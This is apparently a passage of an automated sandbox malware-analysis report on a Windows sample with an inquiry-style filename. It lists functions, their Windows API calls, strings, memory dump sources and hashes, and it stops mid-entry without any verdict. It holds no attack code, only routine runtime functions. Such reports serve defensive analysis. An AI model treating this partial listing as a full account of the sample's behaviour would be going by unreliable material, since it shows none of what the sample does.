                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
                                          • API String ID: 169749273-2073472848
                                          • Opcode ID: 32d41af1f6d9dc77f31641b2c8da1a5f4bc47e30b630122036bf0226cea209ee
                                          • Instruction ID: 89e2dd4d636dfb30d295e96572e3c142a5f4e36836ca282c9461fff940db0c00
                                          • Opcode Fuzzy Hash: 32d41af1f6d9dc77f31641b2c8da1a5f4bc47e30b630122036bf0226cea209ee
                                          • Instruction Fuzzy Hash: FC617D71508304AFC701DF64DC85DAFBBE8FF89710F00492EF695A61A1DB309A49CB62
                                          Function 00E4B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 6320cded22f1471ab165a152262aecd5c2a1f2cbe91c78741ecfa8f4e2ecbd86
                                          • Instruction ID: cad4000429b91c96671ca03db9d03a0c01329fe0d8d5e724c703f5219444afc6
                                          • Opcode Fuzzy Hash: 6320cded22f1471ab165a152262aecd5c2a1f2cbe91c78741ecfa8f4e2ecbd86
                                          • Instruction Fuzzy Hash: 4631AF31A44309A6DB14FE60ED43EFE77A89F29750F606029F501790E2EFA1BE04C675
                                          Function 00E4C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000063), ref: 00E4C4D4
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E4C4E6
                                          • SetWindowTextW.USER32(?,?), ref: 00E4C4FD
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E4C512
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E4C518
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E4C528
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E4C52E
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E4C54F
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E4C569
                                          • GetWindowRect.USER32(?,?), ref: 00E4C572
                                          • SetWindowTextW.USER32(?,?), ref: 00E4C5DD
                                          • GetDesktopWindow.USER32 ref: 00E4C5E3
                                          • GetWindowRect.USER32(00000000), ref: 00E4C5EA
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E4C636
                                          • GetClientRect.USER32(?,?), ref: 00E4C643
                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E4C668
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E4C693
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 7c4c1a4a3ee0f2d798e4b65f5ff47770c4b9a2d10812e6cbcc5b654be1d92560
                                          • Instruction ID: 58974f29f89f31197522713a2f8977d412ef66d1df8882f93be1e26bc7c03b4b
                                          • Opcode Fuzzy Hash: 7c4c1a4a3ee0f2d798e4b65f5ff47770c4b9a2d10812e6cbcc5b654be1d92560
                                          • Instruction Fuzzy Hash: E2515C70900709AFDB20DFA9DE89B6EBBF5FF04709F104929E686B35A0D774A944CB50
                                          Function 00E7A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E7A4C8
                                          • DestroyWindow.USER32(?,?), ref: 00E7A542
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E7A5BC
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E7A5DE
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E7A5F1
                                          • DestroyWindow.USER32(00000000), ref: 00E7A613
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DF0000,00000000), ref: 00E7A64A
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E7A663
                                          • GetDesktopWindow.USER32 ref: 00E7A67C
                                          • GetWindowRect.USER32(00000000), ref: 00E7A683
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E7A69B
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E7A6B3
                                            • Part of subcall function 00DF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DF25EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: 680c5460dce900a5e072d9a5150158f1c23568684bd3e194bf92a4a4e4058664
                                          • Instruction ID: 8e3929fd82752b8fb4019675d9286b9b9c307ff7528a20c5b603370f9c8a1650
                                          • Opcode Fuzzy Hash: 680c5460dce900a5e072d9a5150158f1c23568684bd3e194bf92a4a4e4058664
                                          • Instruction Fuzzy Hash: 0D71C071140205AFD725CF68CC45FAB7BE5FB88704F18852DF989A72A0C774E946CB62
                                          Function 00E74619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E746AB
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E746F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 7f9a1ca28be6db69a33339c1a5f9d61c8b0c73681810df2ab7c2096a1be1d9a0
                                          • Instruction ID: 2e68a9d1dc8f9274b8b1191dcd2fb416bae1b19f10ba8aba84fc797296a46c26
                                          • Opcode Fuzzy Hash: 7f9a1ca28be6db69a33339c1a5f9d61c8b0c73681810df2ab7c2096a1be1d9a0
                                          • Instruction Fuzzy Hash: 349190746043059FCB14EF20C451AAAB7E1EF85314F06A46CF99A7B3A2DB70ED4ACB51
                                          Function 00E7BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E7BB6E
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E76D80,?), ref: 00E7BBCA
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E7BC03
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E7BC46
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E7BC7D
                                          • FreeLibrary.KERNEL32(?), ref: 00E7BC89
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E7BC99
                                          • DestroyIcon.USER32(?), ref: 00E7BCA8
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E7BCC5
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E7BCD1
                                            • Part of subcall function 00E1313D: __wcsicmp_l.LIBCMT ref: 00E131C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 1212759294-1154884017
                                          • Opcode ID: 353ad5dbd169cb8b306cd0ff0d250cc867ffff5d0491adfac4dfed0c43774c54
                                          • Instruction ID: b7e3e820271b22b8e336073008b56ce2070ebf0025665dcd929b16aee4ee569d
                                          • Opcode Fuzzy Hash: 353ad5dbd169cb8b306cd0ff0d250cc867ffff5d0491adfac4dfed0c43774c54
                                          • Instruction Fuzzy Hash: 3D61E071A00218BEEB14DF65CC46FFAB7A8EF08710F10911AFD19E60C0DB74A994CBA0
                                          Function 00E5A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00E7FB78), ref: 00E5A0FC
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E5A11E
                                          • __swprintf.LIBCMT ref: 00E5A177
                                          • __swprintf.LIBCMT ref: 00E5A190
                                          • _wprintf.LIBCMT ref: 00E5A246
                                          • _wprintf.LIBCMT ref: 00E5A264
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                          • API String ID: 311963372-1048875529
                                          • Opcode ID: 768a66e5342d54456f95fb273cd24cab321668b063a3a95f87d8a6afa340d212
                                          • Instruction ID: 8ed9a2350483faa5a442294a8e2f818d95cbdecfc98605c15af4aa3308241020
                                          • Opcode Fuzzy Hash: 768a66e5342d54456f95fb273cd24cab321668b063a3a95f87d8a6afa340d212
                                          • Instruction Fuzzy Hash: 48514D71900209AADF15EBE0DD46EEEB7B9EF08300F149665F605720A2EB316F58CB71
                                          Function 00E5A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • CharLowerBuffW.USER32(?,?), ref: 00E5A636
                                          • GetDriveTypeW.KERNEL32 ref: 00E5A683
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E5A6CB
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E5A702
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E5A730
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: ea75ddca0c344d414d07bfe4dbaf8d9c6f051d2a4fd39be557682237377e9770
                                          • Instruction ID: 8cb9a46949eb1caff33b5e8614efa327b3d653c878c531d8c8b529878d0e88ef
                                          • Opcode Fuzzy Hash: ea75ddca0c344d414d07bfe4dbaf8d9c6f051d2a4fd39be557682237377e9770
                                          • Instruction Fuzzy Hash: FF514C711043099FC700EF20D8919AAB7F4FF88758F09996DF99667261DB31AE09CF62
                                          Function 00E5A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E5A47A
                                          • __swprintf.LIBCMT ref: 00E5A49C
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E5A4D9
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E5A4FE
                                          • _memset.LIBCMT ref: 00E5A51D
                                          • _wcsncpy.LIBCMT ref: 00E5A559
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E5A58E
                                          • CloseHandle.KERNEL32(00000000), ref: 00E5A599
                                          • RemoveDirectoryW.KERNEL32(?), ref: 00E5A5A2
                                          • CloseHandle.KERNEL32(00000000), ref: 00E5A5AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 6af2c2b17b848c45226192dfcd570c5eed7df5ab3a792921cc4e59d5968a8d33
                                          • Instruction ID: aff5645c011539dd7aa9adcea3d074dc1cca474aabd8ef166fd4d11ac86f8fd0
                                          • Opcode Fuzzy Hash: 6af2c2b17b848c45226192dfcd570c5eed7df5ab3a792921cc4e59d5968a8d33
                                          • Instruction Fuzzy Hash: 8631C3B1500209ABDB21DFA1DC48FEB37BCEF88706F1451B6F908E6160E77097888B25
                                          Function 00E2AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                          • String ID:
                                          • API String ID: 884005220-0
                                          • Opcode ID: 494cc700d9e156ed45fec9fa64ca477e21a1e66020273791f1180be63bc45971
                                          • Instruction ID: e791ae567e3f782dfcea6ae526dc3b7f3c858a07dac510f3e7b02f3adddf6f3f
                                          • Opcode Fuzzy Hash: 494cc700d9e156ed45fec9fa64ca477e21a1e66020273791f1180be63bc45971
                                          • Instruction Fuzzy Hash: 05611BB2901225AFDB105F24FC42BA977E9EF11729F286679E811BB1D1DB34CC81C792
                                          Function 00E7C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E7C4EC
                                          • GetFocus.USER32 ref: 00E7C4FC
                                          • GetDlgCtrlID.USER32(00000000), ref: 00E7C507
                                          • _memset.LIBCMT ref: 00E7C632
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E7C65D
                                          • GetMenuItemCount.USER32(?), ref: 00E7C67D
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E7C690
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E7C6C4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E7C70C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E7C744
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E7C779
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: aa0d18dc973cd09197b28c3c309d7d3d60fb9111e96832c8eddf1e055d495c2a
                                          • Instruction ID: 945d96b62647f7ec75f47047eeda30e70be633b8c39530fd4844743935b26a2e
                                          • Opcode Fuzzy Hash: aa0d18dc973cd09197b28c3c309d7d3d60fb9111e96832c8eddf1e055d495c2a
                                          • Instruction Fuzzy Hash: AC81B5701083019FD714CF24D884AAB7BE8FF88718F20952EF999A3251DB70D945CFA1
                                          Function 00E483F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E48766
                                            • Part of subcall function 00E4874A: GetLastError.KERNEL32(?,00E4822A,?,?,?), ref: 00E48770
                                            • Part of subcall function 00E4874A: GetProcessHeap.KERNEL32(00000008,?,?,00E4822A,?,?,?), ref: 00E4877F
                                            • Part of subcall function 00E4874A: HeapAlloc.KERNEL32(00000000,?,00E4822A,?,?,?), ref: 00E48786
                                            • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E4879D
                                            • Part of subcall function 00E487E7: GetProcessHeap.KERNEL32(00000008,00E48240,00000000,00000000,?,00E48240,?), ref: 00E487F3
                                            • Part of subcall function 00E487E7: HeapAlloc.KERNEL32(00000000,?,00E48240,?), ref: 00E487FA
                                            • Part of subcall function 00E487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E48240,?), ref: 00E4880B
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E48458
                                          • _memset.LIBCMT ref: 00E4846D
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E4848C
                                          • GetLengthSid.ADVAPI32(?), ref: 00E4849D
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E484DA
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E484F6
                                          • GetLengthSid.ADVAPI32(?), ref: 00E48513
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E48522
                                          • HeapAlloc.KERNEL32(00000000), ref: 00E48529
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E4854A
                                          • CopySid.ADVAPI32(00000000), ref: 00E48551
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E48582
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E485A8
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E485BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 41f011c1ca4c3f1694ab8e8615378e006cddd0733d07a28c36132c2ae619f04c
                                          • Instruction ID: 989e7cca3928a5df43ef0dfc8ad3ffa9eebcc1ddf76d2266078f3b5a6da1dea0
                                          • Opcode Fuzzy Hash: 41f011c1ca4c3f1694ab8e8615378e006cddd0733d07a28c36132c2ae619f04c
                                          • Instruction Fuzzy Hash: A061567190021AAFDF00DFA5ED44AEEBBB9FF04304F048169E815B7291DB349A45DF60
                                          Function 00E6762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00E676A2
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E676AE
                                          • CreateCompatibleDC.GDI32(?), ref: 00E676BA
                                          • SelectObject.GDI32(00000000,?), ref: 00E676C7
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E6771B
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E67757
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E6777B
                                          • SelectObject.GDI32(00000006,?), ref: 00E67783
                                          • DeleteObject.GDI32(?), ref: 00E6778C
                                          • DeleteDC.GDI32(00000006), ref: 00E67793
                                          • ReleaseDC.USER32(00000000,?), ref: 00E6779E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 13d37f116ebbc59926453f60f060bab0fe1221838943485468cfdf6814f67c26
